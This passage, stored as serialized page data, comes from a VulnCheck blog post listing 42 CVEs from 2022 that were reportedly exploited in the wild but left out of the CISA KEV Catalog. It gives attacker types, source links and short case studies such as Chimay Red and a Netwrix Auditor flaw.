",[47,106149,24590],{"href":106150,"rel":106151},"https:\u002F\u002Fmalpedia.caad.fkie.fraunhofer.de\u002Fdetails\u002Felf.mirai",[51],[47,106153,24620],{"href":106154,"rel":106155},"https:\u002F\u002Fmalpedia.caad.fkie.fraunhofer.de\u002Fdetails\u002Felf.zerobot",[51],", etc.)",[25,106158,106159,106160,2230],{},"Ransomware (e.g. ",[47,106161,32702],{"href":106162,"rel":106163},"https:\u002F\u002Fmalpedia.caad.fkie.fraunhofer.de\u002Fdetails\u002Fwin.clop",[51],[25,106165,106166,106167,2230],{},"Threat Actors (e.g. 
",[47,106168,106171],{"href":106169,"rel":106170},"https:\u002F\u002Fmalpedia.caad.fkie.fraunhofer.de\u002Factor\u002Fapt32",[51],"APT32",[25,106173,106174],{},"Unattributed (a source notes exploitation in the wild but doesn’t provide any attribution information)",[18,106176,106177],{},"The following table contains all 42 vulnerabilities, the reported attacker type, and the publicly-available source indicating likely exploitation in the wild.",[307,106179,106180,106193],{},[310,106181,106182],{},[313,106183,106184,106187,106190],{},[316,106185,106186],{"align":318},"CVE-ID",[316,106188,106189],{"align":318},"VulnCheck Attacker-Type",[316,106191,106192],{"align":318},"Exploited Source",[336,106194,106195,106208,106227,106242,106259,106278,106291,106305,106320,106332,106346,106364,106378,106391,106405,106419,106435,106450,106462,106474,106486,106498,106510,106522,106534,106546,106558,106578,106592,106604,106616,106628,106642,106654,106668,106682,106695,106707,106719,106732,106750,106766],{},[313,106196,106197,106200,106202],{},[341,106198,106199],{"align":318},"CVE-2022-45359",[341,106201,32556],{"align":318},[341,106203,106204],{"align":318},[47,106205,21901],{"href":106206,"rel":106207},"https:\u002F\u002Fwww.wordfence.com\u002Fblog\u002F2022\u002F12\u002Fpsa-yith-woocommerce-gift-cards-premium-plugin-exploited-in-the-wild\u002F",[51],[313,106209,106210,106213,106216],{},[341,106211,106212],{"align":318},"CVE-2022-45045",[341,106214,106215],{"align":318},"Botnet",[341,106217,106218,1246,106222],{"align":318},[47,106219,2709],{"href":106220,"rel":106221},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-45045",[51],[47,106223,106226],{"href":106224,"rel":106225},"https:\u002F\u002Fblog.netlab.360.com\u002Fthe-botnet-cluster-on-185-244-25-0-24-en\u002F",[51],"360 Netlab",[313,106228,106229,106232,106235],{},[341,106230,106231],{"align":318},"CVE-2022-39197",[341,106233,106234],{"align":318},"Threat 
Actor",[341,106236,106237],{"align":318},[47,106238,106241],{"href":106239,"rel":106240},"https:\u002F\u002Fraw.githubusercontent.com\u002Fblackorbird\u002FAPT_REPORT\u002Fmaster\u002Fsummary\u002F2023\u002F360_APT_Annual_Research_Report_2022.pdf",[51],"360",[313,106243,106244,106247,106249],{},[341,106245,106246],{"align":318},"CVE-2022-37061",[341,106248,106215],{"align":318},[341,106250,106251,1246,106255],{"align":318},[47,106252,106254],{"href":82020,"rel":106253},[51],"FortiGuard Labs",[47,106256,106226],{"href":106257,"rel":106258},"https:\u002F\u002Fblog.netlab.360.com\u002Fnew-ddos-botnet-wszeor\u002F",[51],[313,106260,106261,106264,106266],{},[341,106262,106263],{"align":318},"CVE-2022-35914",[341,106265,32556],{"align":318},[341,106267,106268,1246,106273],{"align":318},[47,106269,106272],{"href":106270,"rel":106271},"https:\u002F\u002Fwww.cert.ssi.gouv.fr\u002Fuploads\u002FCERTFR-2023-CTI-001.pdf",[51],"FR-CERT",[47,106274,106277],{"href":106275,"rel":106276},"https:\u002F\u002Funit42.paloaltonetworks.com\u002Fnetwork-security-trends-aug-oct-2022\u002F",[51],"Unit 42",[313,106279,106280,106283,106285],{},[341,106281,106282],{"align":318},"CVE-2022-35526",[341,106284,106215],{"align":318},[341,106286,106287,106290],{"align":318},[47,106288,106254],{"href":81954,"rel":106289},[51]," (see Unknown 
2)",[313,106292,106293,106296,106298],{},[341,106294,106295],{"align":318},"CVE-2022-34721",[341,106297,106234],{"align":318},[341,106299,106300],{"align":318},[47,106301,106304],{"href":106302,"rel":106303},"https:\u002F\u002Fwww.cyfirma.com\u002Fblogs\u002Fwindows-internet-key-exchange-ike-remote-code-execution-vulnerability-analysis\u002F",[51],"CYFIRMA",[313,106306,106307,106310,106312],{},[341,106308,106309],{"align":318},"CVE-2022-34538",[341,106311,106215],{"align":318},[341,106313,106314,1246,106317],{"align":318},[47,106315,106254],{"href":82020,"rel":106316},[51],[47,106318,106226],{"href":106257,"rel":106319},[51],[313,106321,106322,106325,106327],{},[341,106323,106324],{"align":318},"CVE-2022-31499",[341,106326,32556],{"align":318},[341,106328,106329],{"align":318},[47,106330,106277],{"href":106275,"rel":106331},[51],[313,106333,106334,106337,106339],{},[341,106335,106336],{"align":318},"CVE-2022-31199",[341,106338,331],{"align":318},[341,106340,106341],{"align":318},[47,106342,106345],{"href":106343,"rel":106344},"https:\u002F\u002Fblog.talosintelligence.com\u002Fbreaking-the-silence-recent-truebot-activity\u002F",[51],"Talos",[313,106347,106348,106351,106353],{},[341,106349,106350],{"align":318},"CVE-2022-28810",[341,106352,106234],{"align":318},[341,106354,106355,1246,106360],{"align":318},[47,106356,106359],{"href":106357,"rel":106358},"https:\u002F\u002Fwww.welivesecurity.com\u002Fwp-content\u002Fuploads\u002F2022\u002F11\u002Feset_apt_activity_report_t22022.pdf",[51],"ESET 
Research",[47,106361,33465],{"href":106362,"rel":106363},"https:\u002F\u002Fwww.rapid7.com\u002Fblog\u002Fpost\u002F2022\u002F04\u002F14\u002Fcve-2022-28810-manageengine-adselfservice-plus-authenticated-command-execution-fixed\u002F",[51],[313,106365,106366,106369,106371],{},[341,106367,106368],{"align":318},"CVE-2022-27510",[341,106370,331],{"align":318},[341,106372,106373],{"align":318},[47,106374,106377],{"href":106375,"rel":106376},"https:\u002F\u002Fwww.at-bay.com\u002Farticles\u002Flikely-first-exploit-citrix-vulnerability\u002F",[51],"At-Bay",[313,106379,106380,106383,106385],{},[341,106381,106382],{"align":318},"CVE-2022-27226",[341,106384,106215],{"align":318},[341,106386,106387],{"align":318},[47,106388,106254],{"href":106389,"rel":106390},"https:\u002F\u002Fwww.fortinet.com\u002Fblog\u002Fthreat-research\u002Fenemybot-a-look-into-keksecs-latest-ddos-botnet",[51],[313,106392,106393,106396,106398],{},[341,106394,106395],{"align":318},"CVE-2022-26809",[341,106397,331],{"align":318},[341,106399,106400],{"align":318},[47,106401,106404],{"href":106402,"rel":106403},"https:\u002F\u002Fwww.group-ib.com\u002Fresources\u002Fresearch-hub\u002Fhi-tech-crime-trends-2022\u002F",[51],"Group-IB",[313,106406,106407,106410,106412],{},[341,106408,106409],{"align":318},"CVE-2022-26504",[341,106411,331],{"align":318},[341,106413,106414],{"align":318},[47,106415,106418],{"href":106416,"rel":106417},"https:\u002F\u002Fcloudsek.com\u002Fthreatintelligence\u002Fmultiple-rce-vulnerabilities-affecting-veeam-backup-replication",[51],"Cloudsek",[313,106420,106421,106424,106426],{},[341,106422,106423],{"align":318},"CVE-2022-26210",[341,106425,106215],{"align":318},[341,106427,106428,1246,106432],{"align":318},[47,106429,106254],{"href":106430,"rel":106431},"https:\u002F\u002Fwww.fortinet.com\u002Fblog\u002Fthreat-research\u002Ftotolink-vulnerabilities-beastmode-mirai-campaign",[51],[47,106433,106277],{"href":106257,"rel":106434},[51],[313,106436,106437,106440,106442],{},[341,106438,1
06439],{"align":318},"CVE-2022-26186",[341,106441,106215],{"align":318},[341,106443,106444,1246,106447],{"align":318},[47,106445,106254],{"href":106430,"rel":106446},[51],[47,106448,106277],{"href":106257,"rel":106449},[51],[313,106451,106452,106455,106457],{},[341,106453,106454],{"align":318},"CVE-2022-25084",[341,106456,106215],{"align":318},[341,106458,106459],{"align":318},[47,106460,106254],{"href":106430,"rel":106461},[51],[313,106463,106464,106467,106469],{},[341,106465,106466],{"align":318},"CVE-2022-25083",[341,106468,106215],{"align":318},[341,106470,106471],{"align":318},[47,106472,106254],{"href":106430,"rel":106473},[51],[313,106475,106476,106479,106481],{},[341,106477,106478],{"align":318},"CVE-2022-25082",[341,106480,106215],{"align":318},[341,106482,106483],{"align":318},[47,106484,106254],{"href":106430,"rel":106485},[51],[313,106487,106488,106491,106493],{},[341,106489,106490],{"align":318},"CVE-2022-25081",[341,106492,106215],{"align":318},[341,106494,106495],{"align":318},[47,106496,106254],{"href":106430,"rel":106497},[51],[313,106499,106500,106503,106505],{},[341,106501,106502],{"align":318},"CVE-2022-25080",[341,106504,106215],{"align":318},[341,106506,106507],{"align":318},[47,106508,106254],{"href":106430,"rel":106509},[51],[313,106511,106512,106515,106517],{},[341,106513,106514],{"align":318},"CVE-2022-25079",[341,106516,106215],{"align":318},[341,106518,106519],{"align":318},[47,106520,106254],{"href":106430,"rel":106521},[51],[313,106523,106524,106527,106529],{},[341,106525,106526],{"align":318},"CVE-2022-25078",[341,106528,106215],{"align":318},[341,106530,106531],{"align":318},[47,106532,106254],{"href":106430,"rel":106533},[51],[313,106535,106536,106539,106541],{},[341,106537,106538],{"align":318},"CVE-2022-25077",[341,106540,106215],{"align":318},[341,106542,106543],{"align":318},[47,106544,106254],{"href":106430,"rel":106545},[51],[313,106547,106548,106551,106553],{},[341,106549,106550],{"align":318},"CVE-2022-25076",[341,106552,1062
15],{"align":318},[341,106554,106555],{"align":318},[47,106556,106254],{"href":106430,"rel":106557},[51],[313,106559,106560,106563,106565],{},[341,106561,106562],{"align":318},"CVE-2022-25075",[341,106564,106215],{"align":318},[341,106566,106567,1246,106570,1246,106575],{"align":318},[47,106568,106254],{"href":106430,"rel":106569},[51],[47,106571,106574],{"href":106572,"rel":106573},"https:\u002F\u002Fcybersecurity.att.com\u002Fblogs\u002Flabs-research\u002Frapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers",[51],"Alien Labs",[47,106576,106277],{"href":106257,"rel":106577},[51],[313,106579,106580,106583,106585],{},[341,106581,106582],{"align":318},"CVE-2022-24934",[341,106584,106234],{"align":318},[341,106586,106587],{"align":318},[47,106588,106591],{"href":106589,"rel":106590},"https:\u002F\u002Fdecoded.avast.io\u002Fluigicamastra\u002Foperation-dragon-castling-apt-group-targeting-betting-companies\u002F",[51],"Avast",[313,106593,106594,106597,106599],{},[341,106595,106596],{"align":318},"CVE-2022-2486",[341,106598,32556],{"align":318},[341,106600,106601],{"align":318},[47,106602,106234],{"href":106275,"rel":106603},[51],[313,106605,106606,106609,106611],{},[341,106607,106608],{"align":318},"CVE-2022-24500",[341,106610,331],{"align":318},[341,106612,106613],{"align":318},[47,106614,106404],{"href":106402,"rel":106615},[51],[313,106617,106618,106621,106623],{},[341,106619,106620],{"align":318},"CVE-2022-23714",[341,106622,331],{"align":318},[341,106624,106625],{"align":318},[47,106626,106404],{"href":106402,"rel":106627},[51],[313,106629,106630,106633,106635],{},[341,106631,106632],{"align":318},"CVE-2022-2003",[341,106634,106215],{"align":318},[341,106636,106637],{"align":318},[47,106638,106641],{"href":106639,"rel":106640},"https:\u002F\u002Fwww.dragos.com\u002Fblog\u002Fthe-trojan-horse-malware-password-cracking-ecosystem-targeting-industrial-operators\u002F",[51],"Dragos",[313,106643,106644,106647,106649],{},[341,106645,106646]
,{"align":318},"CVE-2022-0456",[341,106648,106234],{"align":318},[341,106650,106651],{"align":318},[47,106652,106404],{"href":106402,"rel":106653},[51],[313,106655,106656,106659,106661],{},[341,106657,106658],{"align":318},"CVE-2021-46850",[341,106660,106215],{"align":318},[341,106662,106663,106667],{"align":318},[47,106664,106345],{"href":106665,"rel":106666},"https:\u002F\u002Fblog.talosintelligence.com\u002Fnecro-python-bot-adds-new-tricks\u002F",[51]," (see VestaCP)",[313,106669,106670,106672,106674],{},[341,106671,62773],{"align":318},[341,106673,106215],{"align":318},[341,106675,106676,1246,106679],{"align":318},[47,106677,106254],{"href":82020,"rel":106678},[51],[47,106680,106226],{"href":106257,"rel":106681},[51],[313,106683,106684,106687,106689],{},[341,106685,106686],{"align":318},"CVE-2021-41506",[341,106688,106215],{"align":318},[341,106690,106691],{"align":318},[47,106692,10441],{"href":106693,"rel":106694},"https:\u002F\u002Fwww.trendmicro.com\u002Fen_us\u002Fresearch\u002F19\u002Fg\u002Fkeeping-a-hidden-identity-mirai-ccs-in-tor-network.html",[51],[313,106696,106697,106700,106702],{},[341,106698,106699],{"align":318},"CVE-2021-4045",[341,106701,106215],{"align":318},[341,106703,106704],{"align":318},[47,106705,106254],{"href":106430,"rel":106706},[51],[313,106708,106709,106712,106714],{},[341,106710,106711],{"align":318},"CVE-2021-4039",[341,106713,106215],{"align":318},[341,106715,106716],{"align":318},[47,106717,106574],{"href":106572,"rel":106718},[51],[313,106720,106721,106724,106726],{},[341,106722,106723],{"align":318},"CVE-2021-31805",[341,106725,106215],{"align":318},[341,106727,106728],{"align":318},[47,106729,106226],{"href":106730,"rel":106731},"https:\u002F\u002Fblog.netlab.360.com\u002Fpublic-cloud-threat-intelligence-202204\u002F",[51],[313,106733,106734,106737,106739],{},[341,106735,106736],{"align":318},"CVE-2017-20149",[341,106738,106215],{"align":318},[341,106740,106741,1246,106745],{"align":318},[47,106742,106226],{"href":106743,"re
l":106744},"https:\u002F\u002Fblog.netlab.360.com\u002Fquick-summary-port-8291-scan-en\u002F",[51],[47,106746,106749],{"href":106747,"rel":106748},"https:\u002F\u002Fwww.ndss-symposium.org\u002Fwp-content\u002Fuploads\u002F2019\u002F02\u002Fndss2019_02B-3_Herwig_paper.pdf",[51],"NDSS Symposium",[313,106751,106752,106755,106757],{},[341,106753,106754],{"align":318},"CVE-2016-20017",[341,106756,106215],{"align":318},[341,106758,106759,1246,106762],{"align":318},[47,106760,106226],{"href":81949,"rel":106761},[51],[47,106763,106359],{"href":106764,"rel":106765},"https:\u002F\u002Fwww.welivesecurity.com\u002Fwp-content\u002Fuploads\u002F2022\u002F10\u002Feset_threat_report_t22022.pdf",[51],[313,106767,106768,106771,106773],{},[341,106769,106770],{"align":318},"CVE-2016-20016",[341,106772,106215],{"align":318},[341,106774,106775,1246,106779],{"align":318},[47,106776,10441],{"href":106777,"rel":106778},"https:\u002F\u002Fwww.trendmicro.com\u002Fen_us\u002Fresearch\u002F20\u002Fg\u002Fnew-mirai-variant-expands-arsenal-exploits-cve-2020-10173.html",[51],[47,106780,106359],{"href":106764,"rel":106781},[51],[61,106783,44260],{"id":92047},[18,106785,106786],{},"Looking over the table, it’s probably obvious that an overwhelming majority of the vulnerabilities are related to botnets (64%). However, there are also a number of ransomware (10%) and threat actor (12%) attributions.",[1925,106788,106789],{},[18,106790,106791],{},"Attacker-Type of Exploited Vulnerabilities Assigned CVE in 2022 Missing From CISA KEV",[78559,106793],{":labels":106794,":values":106795},"[\"Botnet\",\"Ransomware\",\"Unattributed\",\"Threat Actor\"]","[27,6,4,5]",[18,106797,106798],{},"The high rate of botnet-exploited vulnerabilities is interesting. Mirai-like botnets are well-known for flinging exploits all over the internet. That behavior is quickly picked up by honeypots and intelligence-sharing organizations like Unit 42, 360 Netlab, and Fortiguard Labs. 
The high volume of botnet vulnerabilities should be some of the easiest to classify as exploited in the wild.",[18,106800,106801,106802,106806,106807,106812,106813,106817,106818,982,106822,106826],{},"For example, one of the 42 vulnerabilities missing from the CISA KEV Catalog is ",[47,106803,106770],{"href":106804,"rel":106805},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2016-20016",[51]," (aka ",[47,106808,106811],{"href":106809,"rel":106810},"https:\u002F\u002Fwww.exploit-db.com\u002Fexploits\u002F41471",[51],"EDB-41471","). This vulnerability, which finally received a CVE in 2022, has been exploited in the wild for years, and still has ",[47,106814,86029],{"href":106815,"rel":106816},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=html%3A%22id%3D%5C%22dvr_usr%5C%22%22",[51]," of potential targets online. It’s had a Metasploit module since 2017 and is routinely one of the most widely attempted exploit targets on both ",[47,106819,72430],{"href":106820,"rel":106821},"https:\u002F\u002Fdashboard.shadowserver.org\u002Fstatistics\u002Fhoneypot\u002Fmonitoring\u002Fvulnerability\u002F?category=monitoring&statistic=unique_ips",[51],[47,106823,86601],{"href":106824,"rel":106825},"https:\u002F\u002Fviz.greynoise.io\u002Ftrends?view=active",[51],". The NVD entry even notes “exploited in the wild in 2017 through 2022.” It’s obvious this vulnerability belongs in the KEV Catalog.",[61,106828,106830],{"id":106829},"vulnerability-classification-and-exploits","Vulnerability Classification and Exploits",[18,106832,106833],{},"Last week, we analyzed the type of vulnerabilities that were added to KEV in 2022. We found about ⅓ of the vulnerabilities are Initial Access, ⅓ are Client Side, and the other ⅓ fell to the remaining five vulnerability types that VulnCheck assigns. 
However, the 42 missing vulnerabilities don’t match that pattern,likely due to the healthy helping of botnet-exploited vulnerabilities.",[1925,106835,106836],{},[18,106837,106838],{},"Missing Exploited Vulnerabilities Classification",[78559,106840],{":labels":106841,":values":106842},"[\"Client-Side\",\"Local\",\"Initial Access\",\"Credentialed Initial Access\"]","[5,1,32,4]",[18,106844,106845,106846,106850,106851,106856,106857,106862],{},"At VulnCheck, we’re very interested in ",[47,106847,106849],{"href":45535,"rel":106848},[51],"initial access vulnerabilities"," specifically because they are so dangerous. Many of these vulnerabilities appear to provide initial access to small routers and IoT systems. Some will dismiss vulnerabilities in such targets. However, we know those types of targets are used by advanced threat actors to create massive botnets like ",[47,106852,106855],{"href":106853,"rel":106854},"https:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FVPNFilter",[51],"VPNFilter",", and(taken down just last year) ",[47,106858,106861],{"href":106859,"rel":106860},"https:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FCyclops_Blink",[51],"Cyclops Blink",". So, these vulnerabilities should be taken seriously.",[18,106864,106865],{},"They should also be taken seriously because most of them are well-known. More than 30 of the vulnerabilities have public exploits, and at least four of those have Metasploit modules. Additionally, seven have commercially available exploits.",[1925,106867,106868],{},[18,106869,106870],{},"Exploited Vulnerabilities with Exploits",[11128,106872],{":labels":106873,":values":106874},"[\"Public Exploit\",\"Commercial Exploit\"]","[31,7]",[61,106876,106878],{"id":106877},"individual-vulnerabilities","Individual Vulnerabilities",[18,106880,106881],{},"Each of the missing 42 vulnerabilities have interesting context around them too, partly due to the many different sources and unique points of view shared in their public reporting. 
Going through each would be tedious, but the following sections give insight into a few vulnerabilities that should give readers a general feel for the top vulnerabilities CISA missed.",[993,106883,106885],{"id":106884},"chimay-red","Chimay Red",[18,106887,106888,106892,106893,106898,106899,106904,106905,106910],{},[47,106889,106736],{"href":106890,"rel":106891},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2017-20149",[51],", also known as Chimay Red, is a peculiar case. The details of the vulnerability were originally leaked in 2017 during the ",[47,106894,106897],{"href":106895,"rel":106896},"https:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FVault_7",[51],"Vault 7 leak",". The vulnerability affected the HTTP interface of Mikrotik routers (of which, there are currently more than ",[47,106900,106903],{"href":106901,"rel":106902},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=title%3A%22RouterOS%22",[51],"600k"," visible on Shodan). Shortly after the disclosure, a high quality exploit was developed by ",[47,106906,106909],{"href":106907,"rel":106908},"https:\u002F\u002Fgithub.com\u002FBigNerd95\u002FChimay-Red",[51],"Lorenzo Santina",". 
Eventually attackers, including the Hajime botnet, exploited this vulnerability in the wild.",[18,106912,106913,106914,106918,106919,106923],{},"While the vulnerability is getting old, ",[47,106915,86601],{"href":106916,"rel":106917},"https:\u002F\u002Fviz.greynoise.io\u002Ftag\u002Fchimay-red-scanner",[51]," continues to see active scanning for the vulnerability and, using ",[47,106920,41731],{"href":106921,"rel":106922},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=title%3A%22RouterOS+router%22+os%3A%22MikroTik+RouterOS+6.0%22%2C%226.1%22%2C%226.10%22%2C%226.11%22%2C%226.12%22%2C%226.13%22%2C%226.14%22%2C%226.15%22%2C%226.16%22%2C%226.17%22%2C%226.18%22%2C%226.19%22%2C%226.2%22%2C%226.20%22%2C%226.21%22%2C%226.21.1%22%2C%226.22%22%2C%226.23%22%2C%226.24%22%2C%226.25%22%2C%226.26%22%2C%226.27%22%2C%226.28%22%2C%226.29%22%2C%226.3%22%2C%226.30%22%2C%226.30.1%22%2C%226.30.2%22%2C%226.30.4%22%2C%226.31%22%2C%226.32%22%2C%226.32.1%22%2C%226.32.2%22%2C%226.32.3%22%2C%226.33%22%2C%226.33.1%22%2C%226.33.2%22%2C%226.33.3%22%2C%226.33.5%22%2C%226.34%22%2C%226.34.1%22%2C%226.34.2%22%2C%226.34.3%22%2C%226.34.4%22%2C%226.34.5%22%2C%226.34.6%22%2C%226.35%22%2C%226.35.1%22%2C%226.35.2%22%2C%226.35.4%22%2C%226.36%22%2C%226.36.1%22%2C%226.36.2%22%2C%226.36.3%22%2C%226.37%22%2C%226.37.1%22%2C%226.38%22%2C%226.38.1%22%2C%226.38.2%22%2C%226.38.3%22%2C%226.38.4%22%2C%226.4%22%2C%226.5%22%2C%226.6%22%2C%226.7%22%2C%226.8%22%2C%226.9%22",[51],", we can find approximately 10,000 internet-facing hosts that are still vulnerable.",[18,106925,106926,106927,106930],{},"However, the most fascinating part of Chimay Redis that it didn’t receive a CVE until 2022 when VulnCheck requested one (MITRE chose to back-date the year). This vulnerability has been exploited in the wild for approximately five years, and no one saw fit to request a CVE. 
Having a CVE ",[1131,106928,106929],{},"is a requirement to be included in the CISA KEV Catalog",", and, sadly, appears to be the only way to remain in the vulnerability historical record.",[18,106932,106933,106934,106939],{},"It’s also worth noting that back when the ",[47,106935,106938],{"href":106936,"rel":106937},"https:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FThe_Shadow_Brokers",[51],"Shadow Brokers"," leak occurred, there was an effort to identify and assign CVE to zero-day vulnerabilities that had been leaked. This was obviously not the case here. The responsible parties should have done the right thing and ensured this was assigned a CVE five years ago. Maybe there wouldn’t be any more vulnerable internet-facing Mikrotik routers if they did.",[993,106941,106350],{"id":106942},"cve-2022-28810",[18,106944,106945,106946,106950,106951,59],{},"[CVE-2022-28810](",[47,106947,106948],{"href":106948,"rel":106949},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-28810&#x29",[51],"; is an authenticated unrestricted operating system command execution vulnerability affecting ManageEngine ADSelfService Plus. ManageEngine products have been included in several CISA advisories. For example, in October 2022, a ManageEngine vulnerability, CVE-2021-40539, was included in a bulletin titled, ",[1131,106952,106953],{},[47,106954,106956],{"href":82014,"rel":106955},[51],"Top CVEs Actively Exploited By People’s Republic of China State-Sponsored Cyber Actors",[18,106958,106959,106960,106963,106964,106968],{},"This vulnerability was first seen in the wild in April 2022 as a zero-day by ",[47,106961,33465],{"href":106362,"rel":106962},[51]," (full disclosure: this author was involved in the analysis of the vulnerability). Additionally, ESET Research noted in their ",[47,106965,106967],{"href":106357,"rel":106966},[51],"APT Activity Report T2 2022"," report that a “defense contractor in the US” was targeted using this vulnerability. 
Although ESET couldn’t attribute the attack to a specific group, it was lumped in with “China-aligned” APT activity.",[993,106970,106632],{"id":106971},"cve-2022-2003",[18,106973,106974,106975,106979,106980,106984],{},"Dragos researchers shared a ",[47,106976,106978],{"href":106639,"rel":106977},[51],"great writeup"," on finding ",[47,106981,106632],{"href":106982,"rel":106983},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-2003",[51]," in the wild. The vulnerability was discovered in a PLC “password cracking” program advertised on social media. Dragos found the cracking software actually worked as advertised, and the software recovered passwords from AutomationDirect’s DirectLOGIC PLC by exploiting CVE-2022-2003. Also, hilariously, the cracking software drops malware on the host machine in order to join it to the Sality botnet.",[18,106986,106987],{},"ICS-specific vulnerabilities exploited in the wild are few and far between. Dragos uncovered an attacker specifically targeting PLC and engineering workstations. Given the attacker’s active engagement on social media, this vulnerability seems like it should have been an easy add to the KEV Catalog.",[993,106989,106336],{"id":106990},"cve-2022-31199",[18,106992,106993,106994,106998,106999,59],{},"Cisco Talos was able to link ",[47,106995,106336],{"href":106996,"rel":106997},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-31199",[51],", a vulnerability in Netwrix Auditor, to Truebot activity (and eventually Clop ransomware) in an early December 2022 ",[47,107000,11046],{"href":106343,"rel":107001},[51],[18,107003,107004,107005,107010],{},"An advisory for CVE-2022-31199 was published by ",[47,107006,107009],{"href":107007,"rel":107008},"https:\u002F\u002Fbishopfox.com\u002Fblog\u002Fnetwrix-auditor-advisory",[51],"Bishop Fox"," in July 2022. The advisory has no CVE, but it is linked directly to NVD. To our knowledge, there is no public exploit for this vulnerability. 
However, the Bishop Fox advisory, from our experience, provides sufficient details to recreate the exploit with minimal effort. That’s likely why Talos saw the vulnerability exploited a “few weeks” after the advisory was published.",[18,107012,107013,107014,107019],{},"Netwrix Auditor isn’t exactly a household name, and there are ",[47,107015,107018],{"href":107016,"rel":107017},"https:\u002F\u002Fsearch.censys.io\u002Fsearch?resource=hosts&sort=RELEVANCE&per_page=25&virtual_hosts=EXCLUDE&q=services.banner%3A%22.NET%22+and+Services.banner%3A%22System.Runtime.Remoting.RemotingException%3A+Tcp+channel+protocol+violation%22+and+services.port%3A9004+and+services.service_name%3A%22UNKNOWN%22+and+services.tls.certificates.leaf_data.issuer.common_name%3A%22Netwrix%22",[51],"fewer than a dozen"," internet-facing targets. The fact that an attacker chose to weaponize this vulnerability and it was exploited in the wild shows how valuable initial access vulnerabilities are to attackers.",[61,107021,1903],{"id":1902},[18,107023,107024],{},"In this blog, we shared 42 vulnerabilities assigned CVEs in 2022, which were publicly reported to be exploited in the wild. Yet, none of these vulnerabilities are in the CISA KEV Catalog. The CISA KEV Catalog is undoubtedly helpful and a driving force in our industry. Still, as long as it’s missing actively exploited vulnerabilities, it cannot be treated as the authoritative catalog of exploited vulnerabilities. 
Practitioners should augment vulnerability management programs by seeking out additional sources or finding a source with a more complete dataset.",[18,107026,95204,107027,95208],{},[47,107028,78319],{"href":78319,"rel":107029},[51],{"title":219,"searchDepth":220,"depth":220,"links":107031},[107032,107033,107034,107035,107041],{"id":106131,"depth":220,"text":106132},{"id":92047,"depth":220,"text":44260},{"id":106829,"depth":220,"text":106830},{"id":106877,"depth":220,"text":106878,"children":107036},[107037,107038,107039,107040],{"id":106884,"depth":1266,"text":106885},{"id":106942,"depth":1266,"text":106350},{"id":106971,"depth":1266,"text":106632},{"id":106990,"depth":1266,"text":106336},{"id":1902,"depth":220,"text":1903},"A review of the vulnerabilities that should have been added to the CISA KEV Catalog in 2022, but weren't.",{"slug":107044,"sitemap":107045},"2022-missing-kev-report",{"videos":107046,"images":107047},[],[],"\u002Fblog\u002F2022-missing-kev-report",{"title":106086,"description":107042},"blog\u002F2022-missing-kev-report",[1279],"ggd88Xb4cpKJUCVQGIyNVgo35MQ5BI2bC3PoN4KG8EE",{"id":107054,"title":107055,"articles":107056,"authors":107071,"body":107073,"date":107060,"description":107751,"extension":234,"image":7,"link":7,"meta":107752,"navigation":237,"path":107757,"seo":107758,"series":7,"stem":107759,"subtype":7,"tags":107760,"__hash__":107761},"blog\u002Fblog\u002F2022-cisa-kev-review.md","The VulnCheck 2022 Exploited Vulnerability Report - A Year Long the CISA KEV Catalog - Blog - VulnCheck Review of the CISA KEV Catalog",[107057,107061,107064,107067],{"title":107058,"source":3494,"link":107059,"date":107060},"Risky Biz News: White House unveils National Cybersecurity Strategy","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Frisky-biz-news-white-house-unveils?utm_source=substack&utm_medium=email","2023-03-02",{"title":107062,"source":39566,"link":107063,"date":107060},"The US National Cybersecurity Strategy. 
Red-teaming critical infrastructure. Cryptojacking. Updates on the hybrid war.","https:\u002F\u002Fthecyberwire.com\u002Fnewsletters\u002Fdaily-briefing\u002F12\u002F41",{"title":107065,"source":85913,"link":107066,"date":107060},"Here's why Biden's new cyber strategy is notable","https:\u002F\u002Fwww.washingtonpost.com\u002Fpolitics\u002F2023\u002F03\u002F02\u002Fhere-why-biden-new-cyber-strategy-is-notable\u002F",{"title":107068,"source":14378,"link":107069,"date":107070},"557 CVEs Added to CISA’s Known Exploited Vulnerabilities Catalog in 2022","https:\u002F\u002Fwww.securityweek.com\u002F557-cves-added-to-cisas-known-exploited-vulnerabilities-catalog-in-2022\u002F","2023-03-06",[107072],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":107074,"toc":107745},[107075,107078,107081,107085,107089,107096,107099,107104,107108,107111,107116,107120,107133,107142,107147,107151,107160,107174,107177,107181,107206,107229,107232,107235,107239,107257,107262,107266,107274,107288,107291,107294,107321,107324,107328,107337,107360,107363,107368,107372,107378,107384,107388,107391,107394,107399,107403,107406,107409,107414,107473,107475,107480,107538,107540,107545,107603,107605,107609,107612,107618,107626,107629,107634,107638,107652,107664,107673,107682,107708,107711,107718,107720,107723,107737,107740],[18,107076,107077],{},"The number of vulnerabilities is growing at an alarming rate. However, knowing which ones have actually been exploited in the wild is critical for the security community. Both red and blue teams benefit from this intel. It helps us sharpen our focus and act faster and with more precision. That’s why the Cyber Security & Infrastructure Agency (CISA) Known Exploited Vulnerability (KEV) Catalog has risen to prominence within the security community. 
